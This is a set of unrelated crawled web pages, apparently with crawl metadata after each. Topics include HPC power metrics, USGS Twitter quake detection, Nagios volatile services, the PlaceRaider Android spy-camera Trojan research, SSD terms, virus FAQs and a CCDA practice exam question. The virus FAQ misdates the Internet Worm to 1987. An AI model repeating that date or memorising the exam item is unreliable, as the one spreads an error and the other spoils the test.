consumption yields 129.4 GB/(s*kW). This approach gives a detail-rich view, with multiple measures that reveal the various dimensions of power efficiency, and permit fine-grained analysis of a system’s green computing performance. For those who need more of a shorthand, or who only need the overall picture, the measurements can be combined into a single GCPI number for a machine using an average of the GCPIs resulting from a complete HPCC run. Finally, users may decide to selectively include only the portion of the HPCC that matter most to them, or to weight the components individually, to form a “roll your own” metric to serve a set of highly specialized needs. The flexibility of SiCortex’s approach is valuable because it provides a path to preserve the “one number” convenience of both the TOP500 and the Green500 while preserving more levels of detail for later analysis. SiCortex recognizes that, if the GCPI is to be broadly accepted and used by the community, they cannot be the owners and maintainers of the measure. According to Goodhue, SiCortex is in active discussions with several third parties to own the metric and host its governing body. “At that point,” says Goodhue,”we won’t have anything to do with it other than by participating in the GCPI organization and submitting results for our machines.” Although SiCortex isn’t talking publicly about organizations it is in talks with, one potential partner is The Green Grid. The Green Grid (covered in an HPCwire feature earlier this year) is a relatively new organization focused on improving energy efficiency in datacenters and “business computing ecosystems.” After nearly two years, the organization has over 150 members, including power companies, hardware vendors, and end user organizations. Their strategy is focused on the datacenter as a whole, but when I talked with them earlier this year, they could foresee a time when they might be interested in driving their focus down further. This is still probably a little early for them, but if someone else has done the legwork, it might make sense.
<urn:uuid:b05b86c0-f705-4605-a7d4-f1a8b874e176>
CC-MAIN-2017-04
https://www.hpcwire.com/2008/11/06/mine_is_greener_than_yours/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00531-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948159
1,090
2.515625
3
Tremors generate tweets in new USGS earthquake program The Twitter Earthquake Detector could spread the word before official alerts - By Dan Campbell - Dec 21, 2009 The U.S. Geological Survey is testing the use of Twitter as a means to quickly collect and disseminate earthquake-related information. The popular social networking Web site and blogging tool is being used as a means to gather firsthand accounts of seismic events as they unfold. Funded by the American Recovery and Reinvestment Act, the Twitter Earthquake Detector (TED) program is an “exploratory effort” intended to gather real-time earthquake-related messages, according to USGS. The idea is to have people who actually feel a tremor or observe its effects to tweet their observations. The TED system applies location, time and keyword filtering to track accounts of tremors. The system allows for first impressions and even photos of the event to be delivered to the public from within or near the quake’s epicenter prior to any official report. “Many people use Twitter, so after an earthquake, they often rapidly report that an earthquake has occurred and describe what they’ve experienced,” said Paul Earle, a USGS seismologist. “Twitter reports often precede the USGS’s publicly released, scientifically verified earthquake alerts.” TED monitors Twitter for tweets that contain the word “earthquake” in all languages. The system also queries Twitter after USGS or another contributing network to the Advanced National Seismic System detects an earthquake, Earle said. The TED program is intended to augment rather than replace other USGS earthquake projects that rapidly detect and report earthquake locations and magnitudes in the United States and globally. Tweets typically provide the initial information to the public faster than official scientific alerts, which can take between two and 20 minutes, depending on the location of the event. The program has great potential, particularly in areas where seismic instrumentation is sparse, USGS said. “In densely instrumented regions, like California, locations and magnitudes are produced within two to three minutes of an event,” said Michelle Guy, a USGS scientist and software developer. But the “time increases up to 20 minutes in sparsely instrumented regions.” “Analyzing the tweets provides an early indication of what people experience before the quantitative information” is analyzed and delivered, Guy said. However, USGS, which publishes the location and magnitude of about 50 earthquakes a day, cautioned that tweets should be viewed as a preview and supplement to the official report. Twitter-based accounts are admittedly anecdotal and could even prove to be false positives. “The basic difference is speed versus accuracy,” Guy said. The tweets are subsequently attached to the official earthquake alert and report with a summary of the cities and an interactive map showing their origin. The tweets are open to the public to search and analyze. The program may be reviewed at twitter.com/USGSted as well as www.USGS.gov/socialmedia. Earle said people are integral to the success of the TED program. “Without their tweets, we would have no system,” he said. Dan Campbell is a freelance writer with Government Computer News and the president of Millennia Systems Inc.
<urn:uuid:cd59eeb1-3e0f-48ca-966c-298fc2906825>
CC-MAIN-2017-04
https://gcn.com/articles/2009/12/21/usgs-earthquake-twitter-tweets.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00441-ip-10-171-10-70.ec2.internal.warc.gz
en
0.941817
687
2.671875
3
Up To: Contents See Also: State Stalking Nagios has the ability to distinguish between "normal" services and "volatile" services. The is_volatile option in each service definition allows you to specify whether a specific service is volatile or not. For most people, the majority of all monitored services will be non-volatile (i.e. "normal"). However, volatile services can be very useful when used properly... What Are They Useful For? Volatile services are useful for monitoring... What's So Special About Volatile Services? Volatile services differ from "normal" services in three important ways. Each time they are checked when they are in a hard non-OK state, and the check returns a non-OK state (i.e. no state change has occurred)... These events normally only occur for services when they are in a non-OK state and a hard state change has just occurred. In other words, they only happen the first time that a service goes into a non-OK state. If future checks of the service result in the same non-OK state, no hard state change occurs and none of the events mentioned take place again. Tip: If you are only interested in logging, consider using stalking options instead. The Power Of Two If you combine the features of volatile services and passive service checks, you can do some very useful things. Examples of this include handling SNMP traps, security alerts, etc. How about an example... Let's say you're running PortSentry to detect port scans on your machine and automatically firewall potential intruders. If you want to let Nagios know about port scans, you could do the following... Edit your PortSentry configuration file (portsentry.conf) and define a command for the KILL_RUN_CMD directive as follows: KILL_RUN_CMD="/usr/local/Nagios/libexec/eventhandlers/submit_check_result host_name 'Port Scans' 2 'Port scan from host $TARGET$ on port $PORT$. Host has been firewalled.'" Make sure to replace host_name with the short name of the host that the service is associated with. Port Scan Script: Create a shell script in the /usr/local/nagios/libexec/eventhandlers directory named submit_check_result. The contents of the shell script should be something similiar to the following... #!/bin/sh # Write a command to the Nagios command file to cause # it to process a service check result echocmd="/bin/echo" CommandFile="/usr/local/nagios/var/rw/nagios.cmd" # get the current date/time in seconds since UNIX epoch datetime=`date +%s` # create the command line to add to the command file cmdline="[$datetime] PROCESS_SERVICE_CHECK_RESULT;$1;$2;$3;$4" # append the command to the end of the command file `$echocmd $cmdline >> $CommandFile` What will happen when PortSentry detects a port scan on the machine in the future? Pretty neat, huh?
<urn:uuid:1624a238-3a20-4c53-82a7-1d2451e7f7e7>
CC-MAIN-2017-04
https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/volatileservices.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00257-ip-10-171-10-70.ec2.internal.warc.gz
en
0.86387
682
2.59375
3
The rise of mobile malware in the last few years has been well documented, and the latest reports show that malware sending out text messages to premium rate numbers is the type users encounter most often. This prevalence will likely not be challenged for a while – after all, there are not many crooks who would say no to a fast and easy buck – but users must be aware that new malicious software with as of yet unimaginable capabilities will surface in time. One of these malicious programs has recently been unearthed, but luckily for all of us the Trojan posing as a camera app is currently only a prototype created by a team of researchers from the Naval Surface Warfare Center in Indiana and the Indiana University. The name of the malware in question is PlaceRaider, and its goal is to surreptitiously take photos with Android smartphones’ built-in camera in order for attackers to be able to recreate a 3D model of the user’s indoor environment and steal all kinds of information (click on the screenshot to enlarge it): “Once the visual data has been transferred and reconstructed into a 3D model, the remote attacker can surveil the target’s private home or work space, and engage in virtual theft by exploring, viewing, and stealing the contents of visible objects including sensitive documents, personal photographs, and computer monitors,” the researchers explained in a recently released paper. They tested their Trojan on 20 individuals by giving them infected devices. As they went through their day, the malware would take hundreds of photos (along with orientation and acceleration sensor data) and, after filtering out the uninformative ones, would send the remaining ones to the researchers’ remote server. The victims were oblivious to the Trojan’s activities, as the malware is designed to mute the sound of the camera’s shutter. With the images in hand, the researchers then used a computer vision algorithm to generate a rich 3D model, which can be inspected very closely for valuable information. The PoC Trojan has been designed for the Android platform, and the scary part is that the permissions it asks – to access the camera, to write to external storage, to connect to the network, to change audio settings – can easily be seen as legitimate when the malware is packaged within an attractive camera app. The researchers have proved that it is highly likely that successful “visual” Trojans such as this one will eventually find their way into the wild, so in order to prevent users from becoming targets they advise them to get apps only from trusted software developers. Among other things, hardware manufacturers are advised to implement a shutter sound that can’t be muted, and possibly even to make the taking of photos possible only when a physical button is pressed; and Google and Apple (developers of Android and iOS) are urged to make apps also ask permission to collect acceleration and gyroscope data.
<urn:uuid:a205532b-4621-4607-a2cf-9734a5904ed4>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2012/10/01/visual-android-trojan-as-virtual-theft-aid/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00559-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951345
592
2.53125
3
In a knowledge-based economy, information is key. Technology can act as a catalyst to education. E-learning/distance learning can bring education, information, and technical skills to the most remote parts of a country or indeed the world. In order to adequately capture the benefits of information technology, we must improve educational standards. This usually includes basic education reforms, improving math and science skills, and encouraging schools and libraries to go online. Jobs will go where the best trained workforce is. Poor educational skills and illiteracy cost business daily through miscalculations, misspellings, or poor comprehension. Industry needs highly educated individuals to drive the growth and productivity. Technology can help lower costs of providing education or provide more effective education through use of technology. Companies like Cisco increasingly are turning to computer and interactive classes to train their own employees. In the United States, in 2001 the "No Child Left Behind Act" was enacted to help reenergize the US educational system. The law is intended to promote the next stage of raising standards in American education by helping teachers, schools and school districts use challenging standards to guide classroom instruction and student assessment. Technology companies are encouraging the US Congress to ensure adequate funding continues to be available for programs like these. Creative programs such as the Schools and Libraries (E-Rate) program was authorized by the Telecommunications Act of 1996 to provide discounts for connecting schools and libraries to the Internet. Similar initiatives have come from the states. For example, in California, in his first year, Governor Gray Davis called a special session of the legislature which passed four bills now known as READ (Raising Expectations, Achievements and Development). Globally, education is recognized as a key factor in building, maintaining, and leveraging electronic commerce. And, technology is often identified as a means to improve education. The World Economic Forum's (WEF) 2001-2002 "Global Information Technology Report: Readiness for the Networked World" specifically examines the category of "networked learning" to help grade a country's e-commerce preparedness. Among the categories examined are corporate investment in employees IT skills (top three countries are the US, Finland, and Germany), quality of IT training and educational programs (Finland, Netherlands, and Sweden), Internet access in schools (Finland, Canada, and Singapore). Other countries are moving to address the issue of education. For example, Mexico has developed a series of targeted educational initiatives. Mexico's most recent initiative "e-Educacion", will focus on using information technology to educate millions of Mexicans who never had the opportunity to finish primary or secondary school. Similarly, Thailand's "National IT-2000 Plan" envisages improving education in Thailand through the use of technology. Likewise, France identified education as one of six key areas of targeted information communications and technology development under the PAGSI (prepare the entry of France into the Information Society) plan. As stated by John Chambers, CEO and President of Cisco, "Education is the great equalizer in life. In order to properly prepare our children for the jobs of the 21st Century, we need fundamental changes in our education system. Government leaders, teachers, parents, and businesses need to embrace the values of accountability and competition in our schools if we are ever going to improve the current situation." Cisco supports a strong educational agenda and aggressive use of e-learning tools. (Also, see information on Cisco's Networking Academy Program, the world's largest e-learning tool in practice.) Today's low educational standards and poor performance in the United States relative to other industrialized nations are alarming wake-up calls that the K-12 education system is broken and must be fixed. Fundamental educational reform is essential to preserve the health of the US economy. A quality public education system is the cornerstone of a sound society and a dynamic economy. The strength of an economy depends on an educated workforce -workers with basic skills who can think critically and find creative approaches to solving problems. Those skills are important to sustaining our nation's continued growth. Cisco supports TechNet's education reform principles including: High standards and meaningful accountability; Increased competition among public schools, through support for charter schools and other innovative approaches; A strengthened emphasis on excellence in math and science education; Expanded access to technology and effective integration of technology in schools; Outcomes-focused research and development; Improved teacher training, recruitment, and retention; and, An increased yield of technically trained college and university graduates. Cisco believes educational skills worldwide can be fundamentally improved through use of technology. In fact, Cisco itself increasingly trains employees in a virtual, rather than physical classroom setting. More information on Cisco and Education Cisco and E-Learning - Cisco Global Learning Network Cisco E-learning Innovation and Technology News The "No Child Left Behind" US Department of Education Page WEF's Global Competitiveness Report For information on e-learning, visit Skillsoft
<urn:uuid:b2732a69-7f10-46ba-a46a-9619523b2518>
CC-MAIN-2017-04
http://www.cisco.com/c/en/us/about/government-affairs/high-tech-policy-guide/investing-knowledge/e-learning.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00193-ip-10-171-10-70.ec2.internal.warc.gz
en
0.941011
1,007
3.53125
4
Solid-state drives (SSDs) operate on a completely different technological principal than mechanical hard disk drives (HDDs), so naturally there is different terminology to describe SSD technology. Instead of talking about data buffers, cylinders, and sectors, SDD technology is described in terms of flash storage and IOPS. So you need to be prepared to use the right terminology to educate customers about the superior performance of SSD technology. Where an HDD provides non-volatile data storage using a spinning magnetic platter that is read by a mechanical arm, SDDs store data in interconnected flash memory chips. Both types of data storage will preserve data when there is no power, but SSDs offer a number of advantages in terms of speed, reliability, and longevity. For enterprise applications, SSD technology is edging out the old mechanical HDDs as the price-performance becomes comparable. So if you are considering adding SDD technology to your product catalog, here are some of the terms that you need to use to educate your customers: Flash controller – The controller is the part of flash memory that handles communication between the host device and the flash file directory. The flash controller manages wear leveling, error correction, and garbage collection. Hybrid hard disk drive – The hybrid HDD combines mechanical HDD with SSD technology, using a NAND flash chip that serves as a non-volatile data cache for faster operation. IOPS – Unlike HDDs which measure data transfer speeds in megabits per second, SDD technology uses input/output per second or IOPS to measure the maximum number of read/writes. Multi-level cell (MLC) – MLC is flash memory that can store more than one bit of data per cell. It is less expensive than single-layer cell (SLC) and is often used in consumer devices. SLC is considered more reliable and faster, although it is more expensive. Experts say that SLC has 10 to 20 times the endurance of MLC, and has a typical lifespan of 100,000 write cycles vs. 30,000 for MLC memory. NAND – NAND stands for Negated AND or Not AND and is a logic gate in SSD technology that can be written or read in blocks, so individual bytes of data can be written and erased independently. RRAM – Resistive random access memory or RRAM is a type of nonvolatile data storage that stores data by changing the resistance of a polarized material using a memristor or memory resistor. RRAM offers higher switching speeds for SSD technology. Solid-state storage program erase cycle – Also called the PE cycle, this is the process of writing to NAND flash memory, erasing the memory, then rewriting. Flash memory can only accommodate a limited number of PE cycles since each cycle causes some physical damage to the flash media. SSD overprovisioning – As it sounds, SSD overprovisioning is adding more storage capacity than is visible to the host as available storage. This added capacity increases the durability of SSDs by distributing the total number of data writes and erases across a larger group of NAND-based memory blocks. PCIe storage – This is a PCI extension card installed directly in the server. Using a direct connection delivers faster performance than SATA, SAS, or Fiber Channel drives and is well-suited for I/O intensive data processing, such as transaction processing or data warehouses. Tier 0 – This is a level of storage that is faster than others in the storage hierarchy. The lower the tier number is in a tiered storage hierarchy the faster the response time for data retrieval (and the more expensive the hardware). This is part of a trend to move active data faster, rather than moving less active data to slower, less expensive platforms. TRIM – TRIM is a command that tells NAND SSDs when specific blocks of data are no longer in use and therefore can be overwritten. TRIM enables the SSD technology to handle garbage collection to improve overall SSD performance. Wear Leveling – To prolong the serviceable life of SSD technology, wear leveling distributes the read/write cycles among all the data blocks in a storage microchip. Since flash memory can only handle a finite number of read/writes (typically 100,000 PE cycles for SLC NAND flash), wear leveling ensures that wear is even, therefore extending the life of the SSD. These are just some of the common terms you will encounter when discussing the pros, cons, and performance of SSD technology. Educating customers about the greater value of SSD technology may require you to compare SSDs and HDDs, which is somewhat of an apples and oranges comparison. Being able to map the differences between the two data storage platforms using the right terminology will help you clarify the benefits inherent in SSD technology.
<urn:uuid:23e71ac2-5ef5-4893-bafc-dc888ac6f2d5>
CC-MAIN-2017-04
http://www.ingrammicroadvisor.com/components/12-terms-vars-should-teach-customers-about-ssd-technology
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00551-ip-10-171-10-70.ec2.internal.warc.gz
en
0.910022
978
3.734375
4
Testing software quality is an essential part of the development process that includes work before and after the software’s release. Software quality testing is like a more robust form of software debugging—where the development team is concerned with how well the program works as opposed to whether it works. The process not only examines end user experiences with the released product, but also takes into consideration programming quality concerning the ease-of-use for the development team. Standards and expectations can vary widely between software projects, so the components of the software quality analysis and implementation process are different for each project based on the implementation and construction of the finished product. Human and Automated Elements While human programmers are a required part of the software quality testing process, there are automated testing tools that can take on a large share of the work. Utilizing these tools can give your programming team a substantial amount of data to work with to identify, isolate, and resolve issues with the software. Apica offers both on-demand and continuous delivery load testing solutions to test and optimize software performance throughout delivery life cycles. While performance testing is only one small part of any software testing program, it is an important one. Define Your Components An organization can’t just assign programmers to review the software source code without a structured process plan and expect quality results. The developers in charge of the quality test need to answer what specific elements of the software need to be gauged, and what metrics they are going to use to measure those elements. The process should look at the user experience, as well as development aspects like scalability and maintenance. Some example qualitative metrics include ease-of-use, testability, portability, stability, and robustness. Like a reconnaissance mission, it’s best to do an informal walkthrough of the code with the development team to familiarize all members with the different parts of the larger project they may not individually work on. Test the project as both a developer and an end user. This is where proper documentation standards come into play: The notes can make it much easier for developers to understand unfamiliar code. If the team finds that documentation is lacking, they would rate a “documentation” metric “poor.” After the walkthrough, it helps to carry out a code inspection to analyze which parts of the software could benefit from improvements. For example, check to see if functions and variables are using a consistent naming pattern, and if the white space is being used to make the code legible. This is also a good time to test the software on older versions of plug-ins, externally-hosted libraries, operating systems, and web browsers (when applicable) to ensure compatibility with older versions. If you find that you can change a few lines of code to make sure the software works with an older version your end users might reasonably use, it’s worth your while to make the change. During this process, it also helps to examine the program for quantitative metrics like program speed, network bandwidth consumption, and memory use. Addressing issues with the previously mentioned criteria leads to a much more stable and usable program. Automated tools can handle a substantial part of the work at this point, taking on tasks like identifying parts of the code that hit or even create performance bottlenecks. After you’ve established what needs to be improved and addressed in the software, it’s time for the development team to get busy. Mental fatigue can be a productivity killer during the implementation process, so developers can try reviewing code in 60- to 90-minute intervals, looking at about 200 lines of code at a time with at least 20 minutes of break time in between. When you’ve identified code that can be improved and implemented changes, you need to verify that it works by actually running through the code to make sure developers fixed existing problems and didn’t create new ones. Additionally, it helps to have team members other than the ones that programmed the code verify the code: It does the double duty of familiarizing the rest of the team with the code.
<urn:uuid:5f6387b2-484c-4f58-820c-06d19974081f>
CC-MAIN-2017-04
https://www.apicasystem.com/blog/components-testing-software-quality/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00513-ip-10-171-10-70.ec2.internal.warc.gz
en
0.934385
839
2.609375
3
Forgot the fake answer you made up to that online security question? Turns out you’ve got plenty of company. A new study by Google looked at millions of users and found that 40 percent could not remember the answer to a security question when they needed it. It’s not only memorability that’s a problem. Security questions aren’t really all that secure. According to the study, “Statistical attacks against secret questions are a real risk because there are commons answers shared among many users. For example using a single guess an attacker would have a 19.7% success rate at guessing English-speaking users’ answers for the question ‘Favorite food?’" About 16 percent of the answers to common security questions are accessible online, such as through social networking sites. “Even if users keep data private on social networks, inference attacks enable approximating sensitive information from a user’s friends,” said the study. Public records provide common answers too; for example birth and marriage records are a source of mothers’ maiden names for at least 30 percent of Texas residents. Researchers found that “it appears next to impossible to find secret questions that are both secure and memorable.” While the study concludes that security questions still can be useful, researchers suggest they be used with other methods, such as SMS or e-mail based recovery procedures. This story, "The trouble with those online security questions you like to use" was originally published by Fritterati.
<urn:uuid:55fa1a40-b6f7-4b41-84f3-86b8d707a143>
CC-MAIN-2017-04
http://www.itnews.com/article/2925834/the-trouble-with-those-online-security-questions-you-like-to-use.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00421-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944456
318
2.625
3
William F. Slater, III (picture borrowed fromhttp://cnn.com web article on bio-terrorism) VIRUS QUESTIONS AND ANSWERS with Valuable Text Resources 1. What is a computer virus? A computer virus is an intelligent, usually destructive computer program which has the peculiar ability to surreptitiously penetrate a computer system and replicate itself by attaching itself to other programs, while causing problems ranging from irritating system behavior, to destruction of physical system components to massive software and/or data destruction. 2. Besides viruses, what are other types of destructive programs are there? 1. What is a computer virus? A computer virus is an intelligent, usually destructive computer program which has the peculiar ability to surreptitiously penetrate a computer system and replicate itself by attaching itself to other programs, while causing problems ranging from irritating system behavior, to destruction of physical system components to massive software and/or data destruction. 2. Besides viruses, what are other types of destructive programs are there? Trojan Horses -- Like its namesake, this type of program enters a system through an innocent manner and waits for the right moment to unleash its attack. Worms-- A self-replicating program which exists independent of other programs. Logic bombs-- A destructive program which is triggered by a date, time, or event, and when triggered, it destroys data and/or other programs. Salamis-- A special program which invades a financial program and removes assets a "slice at a time", hence the name. Trap Doors-- These are facilities which permit a hacker to surreptitiously enter a system by means of a security loophole which is either inherent in the operating system, or possibly one which the hacker creates which he is a user on the system. Session Hacking-- A special type of hacking which requires hardware, software, and communications expertise. It involves the penetration of a system via network lines and/or possibly through the detection of electronic emissions which radiate from active monitors and terminals. 3. How are viruses transmitted? Viruses are transmitted via magnetic and/or electronic mediums because of careless and/or ignorant computing activities. These magnetic and electronic mediums include: And in some rare cases, viruses may even be spread via wireless networks and/or EPROM (firmware) chips. 4. How has the influence of the online world (the Internet, networks, bulletin board systems, and e-mail) affected the world of viruses? Since November 1987 when the Internet Worm created by Robert T. Morris, Jr. wreaked over $100 million worth of problems on computers connected to the Internet, it has been obvious that having computers connected on a computer network increased the possibility of virus infections. That is not to say that networks are bad, in fact networks are becoming more and more essential and valuable all the time. It's just that being online on a network, a BBS, or dialed into a remote computer increases the possibility of contact with viruses. 5. Will you get in trouble if you report a virus? No. It is expected that all computer users will recognize the seriousness of a virus attack and call your company Help Desk or an experienced person immediately. 6. What can viruses and other destructive software do to your system? Best case, a virus may turn out to be a nuisance, such as playing a song repeatedly at random times. In the worst case, a virus can rapidly spread through a system or a group of systems on a computer network, rapidly destroying programs and data. The biggest problems with viruses is that they can spread and do their work silently, quickly, and efficiently, before you ever discover that they are there. 7. How many viruses are there? At last count, there are over 11,000 viruses, and the list grows at about at least 50 new viruses per month. As you would guess this certainly is enough to keep the anti-virus software producers in business. 8. How do you prevent viruses? Prevention of virus attacks requires a conscious effort in the area of "safe-computing". Safe computing means 1) be careful about the data and programs you put into your system. 2) don't ever operate bootleg (illegal copies) of software on your system 3) you don't leave disks lying in the open where someone may place a virus on it without your knowledge 4) use a virus attack prevention program, such as McAfee's VSHIELD or Symantec Norton Anti-Virus 9. How do you know if you have a virus? Systems which are affected with viruses act erratically. Sometimes the virus will identify itself with a message giving its name on the screen of your computer monitor. In extreme cases, enough data and/or programs may have been destroyed to prevent your computer from successfully booting. Does your PC have any of the following symptoms? 10. How do you stop a virus once you discover you have one? Call the Help Desk or a qualified technical person immediately. Since viruses can constitute a serious threat to a data intensive organization such as a law firm, it is absolutely imperative that virus outbreaks are quickly isolated, identified, and treated so it prevents their continued spread. Your contacting the Help Desk to get experienced people dispatched on the problem is the best way to check a virus attack. 11. Why do people write viruses and other destructive software? Certain people get a thrill from using their intimate technical knowledge of software, computers, and human behavior, to write destructive software which wreaks havoc in the workplace. Another chief reason that viruses are written is to seek revenge against Americans for being ahead in computer technology and in the business environment. Since it is now illegal to write software which destroys other software and data, the people who write viruses are not only doing it to get a thrill, they are also breaking the law and they risk severe criminal and civil penalties if they are caught. An interesting quote from The Computer Virus Protection Handbook by Colin Hayes, pp 28 - 29, 1990, SYBEX, gives further insight about the types of people who write computer viruses: "Viruses have provided a weapon for those members of society who wish to harm others for a variety of reasons. Some of these people are mischievous or destructive vandals, others have political points to make, and still others want to sabotage governments, organizations, or companies that they feel have done them wrong. "Because the computing population has become so big, there now exists a significant number of vandals, sick minds, and people alienated from the mainstream who have the necessary skills to express their feelings by spreading viruses. "There is the copycat phenomenon to consider as well -- for example, one case of someone putting poison into a proprietary medicine can lead to others imitating that action. Unlike drug tampering, however, you cannot stop the spread of copycat virus activity by putting tamperproof seals on software packaging. Also, virus creation grows by going beyond simple copycat activity to inspiring someone to create a better virus... "Particularly intriguing is the possibility of virus creation being a new manifestation of the antagonism felt by some hackers against the way computers are being used by big business, government agencies, and other establishment symbols. Computing is a passion that dominates the lives of many enthusiasts. For some, that passion can develop into obsessional behavior, creating irrational motives to wreak revenge against those perceived to be abusing the "purity" of computing concepts. "Jealousy and a sense of inferiority can also play a role in shaping a hacker's attitudes. A maverick hacker who has difficulty relating to people and the real physical world feels that he must protect the computing environment, in which he functions comfortably, from being controlled by the very individuals and groups he resents. By disrupting systems and destroying data, he demonstrates that he is in control and has tangible power in territory that he regards as his personal space." 12. What are some good reference books on computer viruses and other destructive software? There are several which have been published since 1988. Listed below are several very good texts: Computer Virus Information Text Resources Maximum Security: A Hacker's Guide to Protecting Your Internet Site and Network ISBN 1-57521-268-4, 886 pages, $49.99 1997, Sams Publishing The Underground Guide to Computer Security By Michael Alexander ISBN 0-201-48918-X, 240 pages, $19.95 1996, Addison-Wesley Publishing Co. Robert Slade's Guide to Computer Viruses ISBN 0-387-94663-2, 422 pages, $34.95 Computer Crime: A Crimefighter's Handbook By David Icove, Karl Seger, and William VonStorch ISBN 1-56592-086-4, 440 pages, $24.95 1995, O'Reilly & Associates Complete LAN Security and Control By Peter T. Davis ISBN 0-8306-4548-9, 330 pages, $34.95 1994, Windcrest / McGraw-Hill Computer Viruses, Artificial Life and Evolution By Mark Ludwig ISBN 0-929408-07-1, 374 pages, $22.95 1993, American Eagle Publications (Tucson, AZ) The Little Back Book of Computer Viruses -- Vol. One: The Basic Technology By Mark Ludwig ISBN 0-929408-02-0, 182 pages, $14.95 1991, American Eagle Publications (Tucson, AZ) The Computer Virus Protection Handbook By Colin Hayes ISBN 0-89588-696-0, 192 pages, $24.95 VIRUS! The Secret World of Computer Invaders That Breed and Destroy By Alan Lundell ISBN 0-8092-4437-3, 190 pages. $9.95. 1990, Contemporary Books (Chicago and New York) Computers Under Attack: Intruders, Worms and Viruses Edited by Peter J. Denning ISBN 0-201-53067-8, 566 pages, $24.95 1990, ACM Press, Div. of Addison-Wesley Rogue Programs: Viruses, Worms, and Trojan Horses Edited by Lance J. Hoffman ISBN 0-442-00454-0, 384 pages, $24.95 1990, Van Nostrand Reinhold (New York) Computer Viruses, Worms, Data Diddlers, Killer Programs and Other Threats to Your System By John McAfee and Colin Hayes ISBN 0-312-02889-X, 236 pages, $16.95 1989, St. Martin's Press V.I.R.U.S. Protection: Vital Information Resources Under Siege By Pamela Kane ISBN 0-553-34799-3, 478 pages, $39.95. 1989, Bantam Books Special Section on the Internet Worm Communications of the ACM - June 1989 "The Worm Story" Issue "The Internet Worm: Crisis and Aftermath" by Eugene H. Spafford "With Microscope and Tweezers: The Worm from MIT's Perspective" by Jon A. Rochlis and Mark W. Eichin "Password Cracking: A Game of Wits" by Donn Seeley "The Cornell Commission: On Morris and the Worm" by Ted Eisenburg, David Gries, Juris Hartmanis, Don Holcomb, M. Stuart Lynn, Thomas Santoro Compute!'s Computer Viruses By Ralph Roberts ISBN 0-87455-178-1, 170 pages, $14.95 1988, Computer! Books Publications (Greensboro, NC) Computer Viruses: A High-tech Disease By Ralf Berger ISBN 1-55755-043-3, 276 pages, $18.95 Computer Virus Developments Quarterly: The Independent Journal of Computer Viruses Published quarterly by American Eagle Publications, Inc. P.O. Box 41401 Tucson, AZ 85717 Price $75 per year. Byline: William F. Slater, III is a computer consultant who has been working in theComputer Industry since 1977. He also teaches and writes, and loves this stuff so much that he has a seven-computer network in his home. The names of his computers are Jim, Mitchell, Andreas, Elvis, Peter, Carey, and Bill. To learn more about Mr. Slater and to sample his free class materials, visit him on the web at http://billslater.com or e-mail him at email@example.com. Last Updated: May 10, 1998 By Bill Slater, Webmaster
<urn:uuid:0e61db29-ffe5-4b2c-929a-71b4a9b40758>
CC-MAIN-2017-04
http://www.billslater.com/ws_virus.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00449-ip-10-171-10-70.ec2.internal.warc.gz
en
0.907646
2,671
3.109375
3
The Hopkins, MN School District is turning fun and games into learning and responsibility. Benjamin Friesen and John Wetter of the Hopkins district discussed how their badge program encourages students to demonstrate iPad and digital proficiency. To create a culture of learning and sharing, Hopkins implemented a fun badge program where students earn badges by passing 10-question exams that demonstrate their knowledge of their iPads. The badges include a color scheme, similar to a karate system, where white is the first belt and then as exams get progressively harder, they can build all the way to black — where students are certified as Ninjas. Benjamin said, “the kids are motivated by this, they want to play.” This has caught on so well, that Hopkins has rolled out a few more badges, including: Footprint — This badge ensures students understand digital responsibility, ethics, and how to navigate an increasingly digital world. Online — This badge ensures students know how to interact professionally with their teachers and can backup important documents to the cloud. Scholar — This badge ensures that students understand what academic honesty means and why it is important in school. The badge program has been wildly successful and in the 2013-14 school year, Hopkins rewarded 2,440 badges to students who earned them. Hopkins is taking this to the next level by creating a ‘Genius Team’ of students that can help other students and teachers with IT questions. Ben sees these students as “the first line of defense.” As an added bonus, those in attendance had an opportunity to earn a white badge by answering a few elementary questions about the iPad. We won’t tell you how many passed! Watch the full video of this session now.
<urn:uuid:22c6df41-ef2e-4f46-af27-3487664d30bf>
CC-MAIN-2017-04
https://www.jamf.com/blog/hopkins-schools-ipad-dojo-where-students-become-ipad-ninjas/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00357-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963033
354
2.96875
3
What are the two most likely driving forces motivating businesses to integrate voice and data into converged networks? (Choose two.) Voice networks cannot carry data unless the PRI circuits aggregate the BRI circuits. Their PSTNs cannot deploy features quickly enough. Data, voice, and video cannot converge on their current PSTN structures. Voice has become the primary traffic on networks. WAN costs can be reduced by migrating to converged networks. VoIP provides transport of voice over the IP protocol family. IP makes voice globally available regardless of the data-link protocol in use (Ethernet, ATM, Frame Relay). With VoIP, enterprises do not have to build separate voice and data networks. Integrating voice and data into a single converged network eliminates duplicate infrastructure, management, and costs. Figure 14-7 shows a company that has separate voice and data networks. Phones connect to local PBXs, and the PBXs are connected using TDM trunks. Off-net calls are routed to the PSTN. The data network uses LAN switches connected to WAN routers. The WAN for data uses Frame Relay. Separate operations and management systems are required for these networks. Each system has its corresponding monthly WAN charges and personnel, resulting in additional costs. With separate voice and data networks, Figure 14-7 Separate Voice and Data Networks Cisco Press CCDA 640-864 Official Certification Guide Fourth Edition, Chapter 14
